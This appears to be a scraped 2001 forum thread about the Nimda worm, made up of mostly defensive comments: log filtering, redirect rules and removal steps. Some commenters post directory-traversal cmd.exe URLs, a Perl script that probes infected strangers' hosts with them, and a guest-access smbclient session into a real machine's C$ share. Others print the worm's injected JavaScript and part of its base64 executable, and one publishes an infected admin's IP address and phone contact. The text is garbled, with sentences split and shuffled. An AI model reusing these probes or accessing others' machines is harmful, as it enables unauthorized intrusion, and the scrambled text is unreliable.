...The wav file is called readme.eml. Microsoft Internet Explorer 5.0 and higher will automatically execute the malicious file...
Nowhere on the link you provided does it specify which versions of IE are affected. Indeed, I'm fairly certain that IE6 is *not* affected (or at least requires the user to respond to a dialog box before it will run
On the other hand, I believe that IE4 *is* vulnerable to at least the
Ooops, add this to the end of your current CustomLog statements for access.log and the others: env=!idiots
/var/log/apache/referer.log referer env=!idiots
So for example:
CustomLog
Grue
As long as you know what servers have the exploits (check your server logs), you might as well check out how well the backdoors work...
s te m32/cmd.exe?/c+dir
I connected to a few of them this morning just to check out what files they have.
http://IPADDRESS.COM/scripts/..%252f../winnt/sy
I'm sure you guys can be a little more creative with this...
Air Con
No, the blame is on admins who don't keep their systems up to date.
[F]or those of you using Apache, here's one way you can redirect these nimda probes just like you could the Code Red probes. All the requests vary, but they seem to include a call to one or more of the following somewhere in the string: cmd.exe, root.exe, or Admin.dll. You can't count on these appearing at the beginning or end of the string, so you have to match it anywhere within. I just took the simplest approach by matching either .exe or .dll.
So if you want to redirect such requests to Microsoft support, for example, you might use the following:
RedirectMatch ^.*\.(exe|dll).* http://support.microsoft.com
Since you're using Linux or some other Unix-like operating system (I presume), it's unlikely you need to serve up any pages that include the strings ".exe" or ".dll", so this shouldn't interfere with the normal operation of your site.
"with their freedom lost all virtue lose" - Milton
That's not a threat; it's a friendly offer!
Free, legal music for iTunes users.
As in 'Admin' spelled backwards?
- Windows File Protection errors:
... This file was restored to the original version to maintain system stability":
.tmp files seem to contain the mime attachment data for readme.exe:
.exe files contains the string:
At around the time the virus hit, Windows 2000 event log reported file replacement errors for these files:
"File replacement was attempted on the protected system file
d:\program files\microsoft frontpage\version3.0\bin\fp98swin.exe
d:\program files\common files\microsoft shared\web server extensions\40\bin\tcptest.exe
d:\program files\common files\microsoft shared\msinfo\msinfo32.exe
d:\program files\outlook express\wabmig.exe
d:\program files\outlook express\wab.exe
d:\program files\windows nt\pinball\pinball.exe
d:\winnt\system32\mspaint.exe
d:\program files\outlook express\msimn.exe
d:\program files\internet explorer\connection wizard\isignup.exe
d:\program files\internet explorer\connection wizard\inetwiz.exe
d:\winnt\system32\inetsrv\inetmgr.exe
d:\program files\internet explorer\connection wizard\icwconn2.exe
d:\program files\internet explorer\connection wizard\icwconn1.exe
d:\program files\windows nt\dialer.exe
d:\program files\netmeeting\conf.exe
d:\winnt\system32\cmmgr32.exe
The virus exe references this registry string, so I guess its possible this is where its grabbing some of these paths:
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
- IE crashing on NT:
On NT SP4, IE crashes whenever I try to load it (Dr Watson is triggered). The same crash appears right after logging in as well. If I cancel Watson, IE will continue to run, but the system is very slow. IE also crashed on my Win 2k box, but it works now after I cleaned up some of the virus files.
- It seems the virus created these files, which I deleted:
WINNT\mmc.exe - 56 KB
(icon is the same as for IE html pages)
WINNT\Admin.dll - 56 KB
Admin.dll also showed up in a few IIS directories.
- The bogus mmc.exe process had a couple instances running when I first discovered the virus. I had to reboot to kill them. At the same time, netstat was reporting tons of connections to port 80 of various hosts as the virus tried to spread.
- Lots of mep* files found in the WINNT directory on my NT box. The
mepDF.tmp - 78 KB
mepEO.tmp - 78 KB
mepE3.tmp - 78 KB
mep181.tmp - 78 KB
mep183.tmp - 78 KB
mepE2.tmp.exe - 56 KB
mepE4.tmp.exe - 56 KB
mepE5.tmp.exe = 56 KB
A few more similar looking files.
At one point I noticed one of the mep*.exe processes was running.
- On my Win2K box, these files appeared in hundreds of directories (fewer files found on my NT box - probably something to do with how my virtual IIS dirs are set up):
readme.eml
desktop.eml
sample.eml
desktop.nws (fewer of these than the others)
- A line of javascript code was appended to some of the html and asp files in my virtual IIS dirs:
<html><script language="JavaScript">window.open ("readme.eml", null, "resizable=no,top=6000,left=6000") </script></html>
- One of the virus
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
- My suggestion is to do a full search for any of these files and check them out. Note the modification dates.
Are you aware that a spammer can send you HTML e-mail and know when it is displayed on your screen? All he does is include a unique 1x1 .GIF URL. When his system sees a "GET" on his web server for the .GIF, he knows that your e-mail address is valid, the IP address of your machine, and that he's got a live one. Welcome to more spam. And you cannot turn off HTML fetching from your e-mail or have it ask you first.
These are all examples of gross security flaws that Microsoft has created. Sorry, but that's negligence in its simplist form.
Wrong. Blame Netscape for that. They brought out HTML e-mail.
This worm is spreading through email, even on systems that are 100% patched and running antivirus packages. The problem is the architecture of Outlook and Exchange. Microsoft has known about this for a long time, and has released nothing but quick fixes. I've testified as an expert witness in court cases before, and I would have no problem testifying as to Microsoft's negligence in the case of this particular virus, based on the evidence I have so far (although it's still early).
Microsoft SQL Server is one of the few Microsoft products I would recommend to clients.
It's a reasonably powerful RDBMS. mySQL is simply not an option in most mission critical situations, /. notwithstanding ;)
I'll admit that I haven't used postgreSQL in a production environment (boy I'd love to) so I can't speak to it's scalability, although I will say that it performs much better than MS-SQL on garbage hardware. That's not much of an endorsement, unfortunately, since if all you have is garbage hardware mySQL is probably "good enough" for whatever application you have....
Nowhere on the link [incidents.org] you provided does it specify which versions of IE are affected. Indeed, I'm fairly certain that IE6 is *not* affected (or at least requires the user to respond to a dialog box before it will run .eml or .exe files). Moreover, I'm fairly sure that MS has patches for these vulnerabilities in IE5.
You are correct about IE6 being unaffected. The vulnerability is not present in IE 5.01 SP2 or IE 5.5 SP2. If you've got a lesser version, you should install the service pack, although alternatively there is a patch, which has been available since March when the problem was found.
Comment removed based on user account deletion
We were hit hard by this at my company today. Our IT department just didn't learn its lesson from Code Red, and allowed people to continue running IIS on their personal machines.
Wanna know how to get rid of it? People where I work have had success with the following:
Bill Gates and Steve Ballmer should be drawn and quartered for this one... How much have these vulnerabilities cost companies in the last two years? It's just too bad that product liability laws don't apply to Micro$oft.
"You done taken a wrong turn."
-Bill McKinney, in Deliverance
I was just reading on Symantec's site that this thing shares all the hard drives c - z as "hidden" shares c$ - z$ accessible to the guest account. On a hunch I took the most recent ip out of my apache log file of an infected server attaching me and walla...
smbclient \\\\61.156.8.4\\c$ -U guest
added interface ip=XXX.XXX.XX.XX
bcast=XXX.XXX.XX.255 nmask=255.255.255.0
session request to 61.156.8.4 failed (Called name not present)
session request to 61 failed (Called name not present)
Password:
Domain=[WORKGROUP] OS=[Windows NT 4.0] Server=[NT LAN Manager 4.0]
smb: \> dir
IO.SYS HSR 40774 Mon May 30 17:22:00 1994
MSDOS.SYS HSR 38138 Mon May 30 17:22:00 1994
COMMAND.COM A 54645 Mon May 30 17:22:00 1994
DRVSPACE.BIN HSR 66294 Mon May 30 17:22:00 1994
CDROM D 0 Sat Jun 30 23:44:32 2001
AUTOEXEC.BAT A 32 Sat Jun 30 23:44:40 2001
CONFIG.SYS A 41 Sat Jun 30 23:44:40 2001
WINNT D 0 Sun Jul 1 00:54:08 2001
NTDETECT.COM AHSR 26816 Tue Aug 7 22:27:20 2001
bootfont.bin AHSR 304624 Mon Nov 25 11:00:00 1996
ntldr AHSR 161104 Tue Aug 7 22:27:20 2001
bootsect.dos A 512 Sun Jul 1 00:56:00 2001
boot.ini ASR 295 Sun Jul 1 01:08:40 2001
Program Files D 0 Sun Jul 1 01:07:34 2001
TEMP D 0 Sun Jul 1 01:10:26 2001
InetPub D 0 Sun Jul 1 01:10:40 2001
pagefile.sys A 268435456 Wed Aug 8 02:03:20 2001
Multimedia Files D 0 Sun Jul 1 19:33:22 2001
iFtpSvc D 0 Sun Jul 8 21:21:20 2001
patch D 0 Wed Jul 25 02:44:28 2001
null A 0 Tue Jul 31 20:45:48 2001
RECYCLED DHS 0 Thu Aug 2 01:34:50 2001
KVW3000 D 0 Tue Aug 7 20:28:10 2001
64241 blocks of size 16384. 7666 blocks available
smb: \>
Just hit enter for the password and presto you've got read/write access to the whole hard drive. Now THATS a security breach if there ever was one.
<BR><BR>
QED
Man.. it's nasty too...
paulb
Paul Bettner
Game Developer et al
I haven't until now, actually felt there was enough trash in my Apache logs to warrant any type of filtering. I review them daily to see what traffic is like. Up until now I have been fine using more alone.
These stupid Windows machines... SPAMing my log files. Oh well, I knew the day would come, when I had to resort to filtering and analysis for my personal (small load) web-server.
Anyone designed a counter-strike that can work under Apache to block and notify the admins of such infected boxes or at least stop them in action? There should be a new international law called the "non-proliferation anti-congestion Windows citizen's arrest" treaty, where by any Windows machine with a malicious-worm is lawfully open to attack that doesn't damage data and stops the machine from further spreading the worm including retalitory action from hosts attacked by that Windows host.
(some people will miss that the above is a joke.. You people will find out that the above is a joke after reading this.. you people are slow... pat yourself on the back.)
--- Delta0.. makes no difference.
I binary-edited it and sure enough, it's this Concept Virus thingy. From someone whose address I don't recognize at all. This thing is going to be big--I didn't get a single thing from anyone when the SirCam virus was making its rounds.
-Legion
DO NOT DEL *.EML FROM A FIND DIALOG
If you do a Find for *.eml on My Computer or Local Hard Drives, if you're running Exchange 2K, this will bring up every email in the Exchange IFS. Deleting this entire list is a Bad Thing.
I'm kind of affraid that the creator of the virus would sue me about stealling his "look and feel", but I used a couple of firewall logs to try the same string that the worm uses against one of the IPs that tackled me.. (He started it!)
here is what I got
Directory of c:\
18/09/2001 20:15 57,344 Admin.dll
15/06/2001 16:38 Documents and Settings
25/05/2001 11:20 EditML
29/08/2001 22:43 ftp
20/05/2001 13:38 imagem
20/04/2001 15:12 Inetpub
29/05/2001 14:57 Java
18/09/2001 20:17 jdk1.3.0_02
then
18/09/2001 22:30 57,344 TFTP4524
18/09/2001 22:32 57,344 TFTP4596
18/09/2001 22:32 57,344 TFTP4636
18/09/2001 22:34 57,344 TFTP4656
18/09/2001 22:35 57,344 TFTP4664
18/09/2001 22:47 57,344 TFTP4684
18/09/2001 22:34 57,344 TFTP4700
18/09/2001 20:29 57,344 TFTP4704
and so on... in the end there was the
315 File(s) 23,481,781 bytes
16 Dir(s) 290,287,616 bytes free
I guess the begining is just a list of all infected files... but the middle part I do not know... any thoughts?
at least 56 diferent IPs this last couple of hours.
If you use IE and want to be safe from those hacked pages, just go into your security settings and change the "Launching Programs and Files in IFRAME" to disable and disable all ActiveX scripts. If you run into a site that you trust, add it to your trusted sites (you'll have to enable non SSL encrypted sites being placed into trusted, but That's not too much trouble.)
The Digital Sorceress
> Internet Worm clothing and other novelties.
How do you keep the worm in it?
It's got one sleeve and nothing else.
For safety use buttons, not a zipper.
Make sure you sell them by the gross, because when you have one worm you have many.
Make sure you label them as gross.
Offer a subscription service, the worm-clothing-of-the-month club, so they can keep next month's worm comfortable.
"Got Worms?"
"I'm with Worm ->"
"I'm with Worm ->
->
->
->"
"Did my worm poke you yet?"
"Thanks, Bill!"
"Don't Worm, Be Happy!"
"Worm!"
"With Worm Regards"
"Fly Northwest To Worm Climate"
"Microsoft: Bringing Worms to Minnesota Year-Round"
"My MS Computer Is a Dog, It Has Worms"
"Worms: Automatic Distributed Computing"
"Worms. Because 1GHz is a terrible thing to waste."
Look who's been infected :-) here
It's a marketing page! The "clear and obvious purpose" is to tell you the features of the product in hopes that you'll buy it. I'm not sure how it should be changed to satisfy you.
So what happened to "truth in advertising"? Or are you in league with Scott McNealy who said that "we have no security and should get used to it"?
There are a whole slew of options (you basically create a custom zone, and then tell Outlook to use that zone), but I don't see one for "deny downloading images" or something like that. I'm only running IE 5.0. The IE 5.5 renderer might have some additional security options.
So what you're saying is, the same person who finds an email client more convenient because it hides file extensions from him is going to go into the IE options and set up their own security zone? Suuuuure....
The law states that you can't attack a protected machine. There is nothing protected about an "attacking" machine. If you do nothing malicious (i.e., delete or steal) then I find it hard to believe that any action could/would be taken. I think the people looking for you would have better things to do with their time (oh, like hire you!).
You will not go to jail for shutting down an attacking machine. Even further, if a machine attempts to gain access to your and you eliminate the offending program, I'd say you are doing civilization a service. Can you say "slap on the wrist"?
After today's attack I'd think we'd wise up.
Why doesn't someone with a bit of bandwidth to burn set up a site that allows people to upload apache logs and then will give anyone a list of affected machines ? I know it's open to abuse but it's better than nothing. Easy to put into ipchains/ipfilter scripts then. Could even write a piece o' perl to query the site and do it dynamically.
So what happened to "truth in advertising"?
Name something on that page that is not true.
So what you're saying is, the same person who finds an email client more convenient because it hides file extensions from him is going to go into the IE options and set up their own security zone? Suuuuure....
First of all, it's the mail options, not the IE options. Second of all, I know exactly how to do it, but I don't feel the need, and the vast majority of people don't need to, either.
Again, I'm not saying that the security in Outlook is perfect, but what I am saying is that arguing that mail clients should be intentionally brain damaged so that you can't open a document from a mail message is just stupid. I want more power, but implemented in a safe way. The Linux advocate's solution is to simply take away power ("Just use pine!").
Sometimes it's best to just let stupid people be stupid.
Yes, let's sue everyone who tried to probe your system due to their ignorance for infecting their machines. The last thing I want to have is an email or voicemail for each of our 6,000 dialup customers and many more dsl/dedicated customers saying "take these people offline or I sue". We have SLA's to maintain, so we're not just going to go pull the plug on a $2000/mo circuit because one of their users was infected - we WILL let them know, but flexing your perceived lawsuit muscle makes you look like a complete moron, at least in my eyes.
Blech.
Hi, I am a home user running Windows 2000, IE 5.5, and have installed all security updates from Windows Update. I am *not* running IIS. I have *not* opened or executed any attachments in Outlook Express. (I did however accidentally run Outlook Express yesterday by clicking on a mailto, and it downloaded my mail.)
.eml files on my system, or other evidence of infection.
After reading about this worm, I checked to see whether my C: drive was being shared. It was!!! I am certain I never turned sharing on. However, I can't find any
Questions:
(1) How else can I confirm/refute that I have been infected?
(2) Is it possible to contract the worm just by visiting an infected website, without Outlook being opened?
Thanks,
Jeremy
I would put it in the 10,000's of hits a day for me. I had 14k 404s this morning(total for the month). As of now, 14.5 hours after the start, its at 44k 404s. This little suckers insane.
How many more times will it take before MS beefs up its attention to security problems? I have seen so many of these bugs for Windows lately it's not funny anymore.
The IT dept at my company was having trouble, not because we were infected, but because other companies were and they were hitting us. Hmmmmmm.. Each time this happens people are prevented from doing work and companies loose money.
How much more damage will Microsofts poor attention to security cost us? This begs the question: Is it safe to use MS based OSes in mission critical, military, or other applications where lives or large amounts of money are at stake?
GJC
Gregory Casamento
## Chief Maintainer for GNUstep
This one explains it all...
http://64.74.36.226/
I got the patches from Microsoft for Microsoft(TM) IIS(TM) running on Microsoft(TM) Windows(TM) NT(TM) for one of my work machines. I installed the patches, now the IIS(TM) web server, the ftp server and even the Gopher server won't start. They all get an error saying "The specified module could not be found". So yeah, great patches. They stop the worm from spreading by breaking IIS(TM). Thanks Microsoft.
...
http://www.kryptolus.com/WorMeter.html Now with Nimda ...
--
Violators will be prosecuted and prosecutors will be violated.
Apparently it's a plugin for IIS that scans all incoming requests for anything suspicious, like gigantic URL's and Unicode characters, and blocks them.
. asp?url=/technet/security/tools/URLscan.asp
Could be potentially effective.
http://www.microsoft.com/technet/treeview/default
I'm afraid this might end up modded as Windows-bashing, but it is not meant as that. It's meant to make a point / bring a question.
/. community know very well the effect of these worms - even for those of us who are running *NIX and Apache servers. We only have ONE NT server, which does not even run IIS. But, at one point today I had to deny ALL INCOMING PORT 80 TRAFFIC to our network - not because of machines becoming infected, but because the amount of bandwidth it was consuming was causing other services to suffer. No more than 10 minutes after setting up the port 80 ACLs, the phones started lighting up (although no one was available to answer them at the time.) I have an odd feeling those were web hosting people wondering why their site would not load off of AOL. In this sense, the worm not only affected us (by wasting LOTS and LOTS of bandwidth) but also affected those customers, because we were forced to shut off web sites in order to keep the network running.
I have seen many a virus/worm/trojan for Windows come and go... and I ask myself: Why does the consumer put up with and tolerate this junk? And, how long will the consumer continue to do so?
My general experience is that if a consumer is not happy with a product or service, said consumer will go elsewhere for that product or service in the future. I know personally of a few examples of such, and I am sure most of you know the same. When you signed up for some cheap ISP and always got disconnected because their server crashed, didn't you go somewhere else?
I am sure a lot of people in the
As far as today's attacks, I am not sure how many people ended up with bandwidth problems, I'm sure we were not the only ones hard hit. We're not a huge shop, but we're not tiny either - we're multi-homed and running BGP. The sheer volume of requests was insane - I was running Snort on my Linux workstation (having it intercept and reset exploit connections.) The traffic volume was enough that my 100Mbit Ethernet interface lagged, and the machine itself did also. I put out several hundred megs in logs within a few hours.
What's rough is, when these NT machines decide to attack you, there's not much you can do about it except ride it out. Basically, I've stuck some PHP code on our home page that pops up a large warning to all IE users with a link to an article and links to download Netscape and Mozilla. I've implemented Apache::Nimba on our web server, blocked port 80 to our dialups so their modems don't get hammered, and ripped out all unused netblocks from BGP advertisement. There's no way to really STOP these machines (without some sort of hackback, which doesn't work under 2K from what I've been told.)
But, back to the original topic at hand. When is enough enough? I think consumers are finally starting to catch on... I've already had one poor guy call in several times threatening to cancel his service and go to AOL because he can't get the GSM codecs for Yahoo Messenger to download under WinME - he claims that it says he has to call us for permission to download them. He's already started asking me about Linux, wanting to know how to "get this Windows out of my computer and get something better." All he wants is his machine to work and he's getting frustrated that it won't. A friend of mine is having yet more ME woes with her machine. Lots of people have told me they will NOT be going to Windows XP. (And that once the current version they use is end-of-lifed, they'll find another OS.) I personally will not have anything newer than Windows 98SE - which seems to be halfway stable.
I think consumers are starting to catch on, which is not good for Microsoft (but is good for their competitors, I guess.) I promote Linux and Open Source software every chance I get, and I use them every chance possible. Open Source has saved my butt more times than I can count. Snort was a lifesaver for us and several co-lo customers' servers today. We were getting hit hard enough that getting a TCP connection into any of the servers was almost impossible until I started Snort. Apache has been a great platform for our web hosting, PHP has saved me many many times and has made life a LOT easier. Mozilla has become my browser of choice (they don't even make IE for my OS.) I'm even developing some Open Source software of my own (and plan to release it on SourceForge.)
Question is, how much longer will people put up with this sort of crap before they realize that it's Windows doing it, that ONLY Windows machines are infected by most of these worms. (Yes, I know, there are Linux worms out there, I'm aware of that.. but my experience has shown there are more Win worms than Lin worms.)
Only time will tell.
Yeah, sorry, that was me. (:
I had an argument...with the person here at the university that teaches OS design. I wonder when I'll learn --Linus
MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="====_ABC1234567890DEF_====" X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 --====_ABC1234567890DEF_==== Content-Type: multipart/alternative; boundary="====_ABC0987654321DEF_====" --====_ABC0987654321DEF_==== Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable --====_ABC0987654321DEF_====-- --====_ABC1234567890DEF_==== Content-Type: audio/x-wav; name="readme.exe" Content-Transfer-Encoding: base64 Content-ID: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm 5vdCBiZSBydW4gaW4gRE9TIG1v ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1Tz yZqkU8dbVPPJmqSzxytU88cbVO PBG1TzyZqkQ8fbVPPMmzSTxwtU88UmljaHG1TzwAAAAAAAAAAN DDxwIAAAB/UEUAAEwBBQB1Oqc7 AAAAAAAAAADgAA4BCwEGAABwAAAAYAAAAAAAALN0AAAAEAAAAI AAAAAAFzYAEAAAABAAAAQAAAAA AAAABAAAAAAAAAAAEAEAABAAAAAAAAACAAAAAAAQAAAQAAAAAB AAABAAAAAAAAAQAAAAAAAAAAAA AACEgQAAUAAAAADgAACIHgAAAAAAAAAAAAAAAAAAAAAAAAAAAQ A4CgAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAI QBAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAudGV4dAAAAFZlAAAAEAAAAHAAAAAQAAAAAAAAAA AAAAAAAAAgAABgLnJkYXRhAAAq CQAAAIAAAAAQAAAAgAAAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAA AAKEcAAACQAAAAIAAAAJAAAAAA AAAAAAAAAAAAAEAAAMAucnNyYwAAAAAgAAAA4AAAACAAAACwAA AAAAAAAAAAAAAAAABAAABALnJl bG9jAABGCwAAAAABAAAQAAAA0AAAAAAAAAAAAAAAAAAAQAAAQg AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
It's a Micro$oft virus, both because of SHITTY server software and because of SHITTY client software Mr.G and his gang put to market.
For myself, I happily keep using non-M$ software, non-Intel-based hardware. But I wished those IDIOTS would give BLAME where it's DUE.
i'm a poor dialup user hosting a few domains on a linux box under a table here (not joking).
i've got a dynamic dialup right now and i've seen over 6200 hits from this annoying bug. Most of them in the same 208.16.xx.xx ip block i'm...
its really sad that someone has the time to write something like this, whats worse people running nt/w2k/IIS almost never patch for this.
It looks like Nimda may go DDOS after propagation.
access_log:
www.altered.com 139.50.200.221 - - [18/Sep/2001:20:55:51 -0700] "-" 408 - "-" "-"
tcpdump shows a bunch of requests being opened with port 80, but never completing.
I'm not sure if this is a bug, or a feature of the worm. The DOS sessions seem to come on blocks of 16, the same number of requests made during the earlier infection period.
Last data-point of interest; I have access to networks 7000 km apart. The server off shore is seeing very little other than the 408's, while the other has yet to see them at all.
Here's a simple perl program that listens on a
port. If you set it to listen on port 80, it will
print out what comes in on that port.
#!/usr/bin/perl -w
use IO::Select;
use IO::Socket;
use strict;
unless (@ARGV > 0) { die "usage: $0 " }
my $port = shift(@ARGV);
my $work_no = 0;
my $sel = IO::Select->new();
sub REAPER
{
wait;
}
$SIG{CHLD} = \
my $server = IO::Socket::INET->new(Proto => "tcp",
LocalPort => $port,
Listen => SOMAXCONN,
Reuse => 1);
die "can't setup server: $!" unless $server;
print "server $0 accepting clients\n";
my $client = 0;
my $serial = 0;
while ($client = $server->accept())
{
if (fork() == 0)
{
my $remote_ip = "";
$client->autoflush(1);
$remote_ip = inet_ntoa($client->peeraddr);
print scalar(localtime), " connect from ", $remote_ip, "\n";
my $line = "";
while($line = )
{
print $line;
if ($line !~ m/\S/)
{
last;
}
}
close $client;
}
else
{
close $client;
}
}
...
This wil log everything to the malfreq.log file.
I got about 43 requests per second already at this moment on our network what is being considered by me as a DOS attack instead of a WORM.
It also connects to port 80 leaving the port open after checking with TCPDUMP.
--- I am known for the ones who want to find me on the net. Is that a privacy risk or a privilege? One might wonder..
Damn.
... and, of course, they won't let us patch it without (lengthy) approval. So guess what machine gets compromised, and scans until it find an inadequately secured share on one server that it can use to leapfrog to the whole network?
Just spent 10 hours reparing the damage done by Nimda. !^*&*@ this is a nasty worm. basically it scans for every NT and Outlook exploit possible, and attacks the entire network.
While I've gotten my clients to reduce their NT dependance, we've got this one vendor machine
Anyway, Russ, if you still need data on the Nimda virus, boy howdy do I got it.
-Josh
Oh,
..
be sure you put "common" instead of "virtual" (unless you use the same setup as I do)
Else it'll fail graciously
--- I am known for the ones who want to find me on the net. Is that a privacy risk or a privilege? One might wonder..
http://209.129.41.37/
/.'ers to help educate this man on the differences between a Windows machine and a Unix machine.
This is the story of a man named Rich. His IP address showed up in my access_logs and I typed it into my address bar and, lo and behold, it's an infected page.
As you can see here, his phone number is proudly displayed on the page. So I called it.
He says he's running Unix.
This is a page originating from the Southwestern College in Chula Vista, CA. Don't attend college there. You might wind up like Rich, not knowing an IIS server from a Unix server.
I encourage my fellow
He was upset that I called at 11 PM. I was equally upset that he was playing a part in choking our bandwidth.
Useless opinions, worthless observations, and more!
All Java applications run through the security manager. The catch 22 is that the default manager is quite lenient. Ever since Java 2 came out tho, the default security restraints have been managed via a file called java.policy. It lets an application do a lot of things, but many of the more dangerous ones are default denied. Of course, you still have to deliver the application. An applet or Java Web Start app is easy enough to get a user to run, but it is nearly impossible to break through the security from those systems. In other words, you have to get the application on the computer and run it. No easy task.
BTW, when I say nearly impossible, I mean that there is pretty much one way around. You can create a signed app and hope like hell that the user doesn't pay any attention to all the quizing about "not recommending running this program". Unless you can get a Verisign cert of course...
Javascript + Nintendo DSi = DSiCade
Just add the following to your httpd.conf:
/scripts/ http://www.microsoft.com/
/vti_bin/ http://www.microsoft.com/
/_mem_bin/ http://www.microsoft.com/
/c/winnt/ http://www.microsoft.com/
/d/winnt/ http://www.microsoft.com/
/msadc/ http://www.microsoft.com/
/MSADC/ http://www.microsoft.com/
Redirect permanent
Redirect permanent
Redirect permanent
Redirect permanent
Redirect permanent
Redirect permanent
Redirect permanent
This way, any time the worm hits you it'll go to the Borg instead...
Well, it makes sense that if they've been hacked, they have one of the "hackable holes" open. Of course, the worm tests all of the holes it could have got in through.
/usr/bin/perl
/var/log/httpd-access.log > access.txt");
/dev/null http://$_") == 0)
/dev/null: Not Found
/dev/null: Not Found
/dev/null: size of remote file is not known
5 c../winnt/system32/cmd.exe?/c+dir
/dev/null: size of remote file is not known
/dev/null: Internal Server Error
/dev/null: Connection reset by peer
/dev/null: Connection refused
/dev/null: Connection refused
/dev/null: Connection refused
/dev/null: Connection refused
/dev/null: Connection refused
/dev/null: Connection refused
/dev/null: Connection refused
/dev/null: Connection refused
/dev/null: Connection refused
/dev/null: Connection refused
/dev/null: Connection refused
This little perl script tells you which hole(s) in a target IP were used and are still open:
#
system("grep $ARGV[0]
system("cat access.txt | awk '{print \$1 \$7}' | sort | uniq > accesstmp.txt");
open INHANDLE, "accesstmp.txt" or die "Cannot open temp file. Exiting.";
while ( <INHANDLE> )
{
if (system("fetch -q -o
{
print "*************** Vulnerable: $_";
}
}
close INHANDLE;
Example usage:
perl testip.pl your.lamers.ip.here
Output:
fetch:
fetch:
fetch:
*************** Vulnerable: 142.150.48.152/_vti_bin/..%255c../..%255c../..%25
fetch:
*************** Vulnerable: 142.150.48.152/c/winnt/system32/cmd.exe?/c+dir
fetch:
fetch:
fetch:
fetch:
fetch:
fetch:
fetch:
fetch:
fetch:
fetch:
fetch:
fetch:
fetch:
It all goes downhill from first post
For all those who think they can hack past IIS (worm or no worm), this guy:
:-)
http://www.msdelphi.com
..has laid down the challenge. Apparently he's been in contact with some hackers and challenged them, and they failed. According to them, with all the latest security patches applied, IIS 5 is solid... until they find the next exploit
Plonk
And before anyone starts quoting the Microsoft license, ISPs that run Linux/*BSD/Solaris are being hurt by the traffic, too. They have no license with Microsoft and they've been injured by Microsoft's negligence.
They are also not bound by the "you can't sue us" clause either...
'd like to see AOL, Earthlink, or some other big ISP take Microsoft's corporate butt to court, demanding compensatory and punitive damages for Microsoft's negligence.
Except it probably needs to be an ISP who does NOT use Microsoft software...
I did pretty much what a user already said: /s
/s
/winnt/mmc.exe had been replaced by a copy of the worm, and was being loaded as 4 processes/jobs, that were un-terminable because of some strange permissions setting. could not kill jobs. instead:
.eml files everywhere, and makes sure it's mmc.exe file is still present so when you boot again, the lucrative code it inserts (Some say in SYSTEM.INI, untrue for me, mine was launching out of some process in IIS that I could never find) is run, so it appears to be a never ending battle.
/.-type site, or anti-virus site can post removal instructions and
/. are nixers and complete asses at that, wasting their time talking about how if only they could write some program to destroy NT boxes instead of helping the situation. give me a break.
1. stop, and disable
a. IIS Admin Service
b. WWW Publishing Service
2. >del *.eml
3. >del *.nws
the next step was the hurdle. the
4. ren \winnt\mmc.exe mmBc.BexeB
5. reboot NOW!
6. check your process list (Task Monitor) for occurences of MMC.EXE. if you don't see any, you were successful. if you see one or more, chances are you are still blasting the net.
another good check is >netstat
just look at your outgoing port:80 requests. if your web server is off and you are seeing these, you are most definitely still infected. put another quarter in and try again.
this worm works in some sort of cycle. during the iterations, it scans for web docs to modify, copies the
If the worm cycles before you can reboot, it doesn't matter what you renamed/deleted, be prepared to do it over again. it took me 4 tries + 4 reboots to get it to work.
this is not going to work foreverbody. I do not install unecessary programs on the server, such as IE suite (Outlook Express, etc.) so I was not taken advantage of on the email bit. If you have this too, you will find a lot more files you will have to hunt down and delete or rename in order to free yourself, and remember, the cycle is the key. if one of those worm processes starts into a new iteration while you are cleaning house, you are screwed, you have to start all over again.
you may have to look into other areas of how you are being attacked. review datafellows docs (www.fsecure.com) for best info.
I hope this is helpful since
1. not one news site,
2. most of the people here at
./ers: you need to realize people who use NT don't do it because they "love", or "respect" microsoft. they are either intimidated by nix, are too stupid to know any better, or are forced to by prior company decisions/investments (probably the majority). they are having to shove shit against two tides: the worm and YOU. so pull your drawers up and start churning your brains to help those lost NT users who can't get their car started.
ps: big kudos to McAffee for saying on their web site they can disinfect the Nimda worm when they can't. best lie I've heard all year.
There are many flaws in their "Knowledge Base" that have never been patched -- some of which are related to security.
There are also quite a few where you have to phone up and chase Microsoft to get a patch.
... grab your Apache/websnarf/something-that-listens-on-port-80 logs and send them to places like DShield.org so they can track the spread of the worm.
NOT! Without a scan for infected files you are dead. EXE files are infected, see the CERT advisory at www.cert.org.
And Linux never crashes/never has security holes
idiot
As an IT person working for a local VAR I had to dissect the thing and automate removal ASAP (i.e. before the AV companies got around to doing so). So far there's only two co's which auto-detect and delete the offending files - CAI and McAfee.
.REG FIRST, MAKE SURE THEY ARE APPROPRIATE FOR YOUR ENVIRONMENT/NEEDS!!! E.g. the .REG is not appropriate for Windows 95).
:).
/delete
/delete
\ Cu rrentVersion\Network\LanMan\C$]
\ Cu rrentVersion\Network\LanMan\D$]
\ Cu rrentVersion\Network\LanMan\E$]
\ Cu rrentVersion\Network\LanMan\F$]
\ Cu rrentVersion\Network\LanMan\G$]
\ Cu rrentVersion\Network\LanMan\H$]
\ Cu rrentVersion\Network\LanMan\I$]
\ Cu rrentVersion\Network\LanMan\J$]
\ Cu rrentVersion\Network\LanMan\K$]
